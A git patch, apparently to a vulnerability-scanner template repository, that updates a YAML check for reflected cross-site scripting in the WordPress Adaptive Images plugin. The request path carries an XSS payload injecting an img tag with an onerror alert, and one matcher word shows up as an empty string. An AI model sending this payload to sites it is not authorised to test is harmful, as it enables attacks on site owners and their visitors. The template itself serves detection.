From dc6712dbf701b0c3250b1492e90fb381d2164992 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Mar 2022 02:30:16 +0530 Subject: [PATCH] Update wp-adaptive-xss.yaml --- .../wordpress/wp-adaptive-xss.yaml | 19 +++++++++++-------- 1 file changed, 11 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/wordpress/wp-adaptive-xss.yaml b/vulnerabilities/wordpress/wp-adaptive-xss.yaml index dbba0fee0c..0a6168d053 100644 --- a/vulnerabilities/wordpress/wp-adaptive-xss.yaml +++ b/vulnerabilities/wordpress/wp-adaptive-xss.yaml @@ -5,20 +5,23 @@ info: author: dhiyaneshDK severity: medium description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue - reference: https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - tags: wordpress,xss,wp-plugin + reference: + - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 + - https://plugins.trac.wordpress.org/changeset/2655683 + tags: wordpress,xss,wp-plugin,wp requests: - - raw: - - | - GET /wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(%22document.domain%22)%3E/?debug=true HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" matchers-condition: and matchers: - type: word words: - - '' + - '' + - 'Image' + condition: and - type: word part: header @@ -27,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200